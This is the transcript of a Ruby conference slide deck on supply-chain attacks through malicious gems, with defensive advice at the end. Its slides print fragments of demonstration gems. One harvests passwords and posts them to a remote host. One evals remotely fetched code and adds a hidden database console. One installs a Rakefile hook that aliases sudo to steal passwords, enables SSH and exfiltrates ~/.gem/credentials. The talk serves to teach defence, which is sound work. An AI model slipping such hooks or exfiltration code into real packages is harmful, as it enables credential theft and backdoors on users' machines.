Hacking with Gems (Ancient City Ruby)

Hacking with Gems Benjamin Smith @benjamin_smith

How-to get rich quick and (maybe) not go to jail!

Ben Smith cannot be held accountable for anything that will
happen to you as a result of installing his gems. He also cannot be held responsible for anything that happens as a result of installing anyone ELSE’S gems. This offer may not be combined with any other offers. Ben Smith’s gems were processed in a location that also processes peanuts. Not valid in the state of Nevada. Ben Smith’s gems may contain substances known in the state of California to cause cancer.

who i am

what i am NOT

please do not try this at home

how it all started GEM remote: https://rubygems.org/ specs: actionmailer (3.2.12)
actionpack (= 3.2.12) mail (~> 2.4.4) actionpack (3.2.12) activemodel (= 3.2.12) activesupport (= 3.2.12) builder (~> 3.0.0) erubis (~> 2.7.0) ...

what’s the worst that could happen?

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

before... github.com/benjaminleesmith/awesome-rails-flash-messages

after! github.com/benjaminleesmith/awesome-rails-flash-messages

some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages

?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages

i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages

“development.log” ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages

elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages

proﬁt • Step 1: do something • Step 2: do
something else • Step 3: ???? • Step 4: proﬁt

proﬁt • Step 1: write a gem that does something
• Step 2: • Step 3: • Step 4:

• Step 2: add code to harvest emails/pws • Step 3: • Step 4:

• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:

• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: proﬁt

• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: proﬁt • Step 5: ﬂee the country

a one way ticket to

that was easy. what else can I do?

gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector

show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V
+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector

how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector

database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

/users/sign_in github.com/benjaminleesmith/net_http_detector

/users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector

hello db access! github.com/benjaminleesmith/net_http_detector

SELECT * FROM users; github.com/benjaminleesmith/net_http_detector

UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector

CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector

careful of wolves in sheep’s clothing

proﬁt • Step 1: • Step 2: • Step 3:
• Step 4: • Step 5:

• Step 2: • Step 3: • Step 4: • Step 5:

• Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:

• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:

• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: proﬁt • Step 5:

• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: proﬁt • Step 5: ﬂee the country

i like the beach

that was easy. what else can I do?

gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s

what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1
Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s

what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s

better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0
8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s

behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar
-zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s

what what github.com/benjaminleesmith/better_date_to_s

i can haz source github.com/benjaminleesmith/better_date_to_s

truth time • this gem doesn't actually work • but
it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s

so much code so little time • Step 1: write
a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: proﬁt? • Step 5: ﬂee the country

that was easy hard. what else can I do? (that's
easier)

gem install be_truthy github.com/benjaminleesmith/be_truthy

what it does > true.should be_true > User.new.should be_true >
User.new.should be_truthy github.com/benjaminleesmith/be_truthy

what it ACTUALLY does github.com/benjaminleesmith/be_truthy

github.com/benjaminleesmith/be_truthy

ﬁle tree looks ok github.com/benjaminleesmith/be_truthy

source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

but what was this? github.com/benjaminleesmith/be_truthy

I see no C github.com/benjaminleesmith/be_truthy

run the what ﬁle? Gem::Specification.new do |gem| ... gem.extensions =
["Rakefile"] ... end github.com/benjaminleesmith/be_truthy

there is no Rakeﬁle github.com/benjaminleesmith/be_truthy

the real ﬁle tree github.com/benjaminleesmith/be_truthy

what does the Rakeﬁle do? github.com/benjaminleesmith/be_truthy

sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy

File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy

FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy

what does "sudo" do now? github.com/benjaminleesmith/be_truthy

print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy

/usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .
-passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy

Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy

ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy

take away: don't install ben's gems

how could I get you to install my gems?

what gems are trustworthy?

how can I add my code to already trusted gems?

back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip
).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy

gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

now I own your gems github.com/benjaminleesmith/be_truthy

> git clone your-gem-repo ...add a little code... > rake
build > gem push your-gem github.com/benjaminleesmith/be_truthy

do people trust your gems?

do people who install your gems have trustworthy gems?

there’s still one problem

bootstrapping

being popular sucks

conferences

webmock

rspec-given

quacky

social engineering

• matt • smoe • bttf • james • tlittle
• rbabcock • nusco • ixil • Stuart • eileen • jay • Michael • christopher.mcnabb

so what happens now?

ruby gems goes down

heroku deploys go down

i go to the beach

ruby gems goes down

heroku deploys go down

recovery

so what now?

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

Little Snitch obdev.at/products/littlesnitch/index.html

gem install be_truthy github.com/benjaminleesmith/be_truthy

fseventer fernlightning.com/doku.php?id=software:fseventer:start

don’t “gem install” from strangers

gem fetch vs gem install > gem fetch be_truthy >
gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy

curl -#L https://get.rvm.io | bash -s stable --autolibs=3 --ruby

gem install rails -P HighSecurity

> gem install rails -P HighSecurity Fetching: activesupport-3.2.12.gem (100%) ERROR:
While executing gem ... (Gem::Exception) Unsigned gem

gem cert --build

https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust

sandboxing

github.com/rubygems/rubygems

tools to detect malicious code

private gem repos

do not try this at home

don't install gems you don't need to

pay attention to what your gems do

monitor your system

read the source

gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary

on install github.com/benjaminleesmith/coal-mine-canary

the results github.com/benjaminleesmith/coal-mine-canary

thank you!

questions? ideas? @benjamin_smith https://github.com/benjaminleesmith

Hacking with Gems (Ancient City Ruby)

Hacking with Gems (Ancient City Ruby)

More Decks by Benjamin Smith

Other Decks in Technology

Featured

Transcript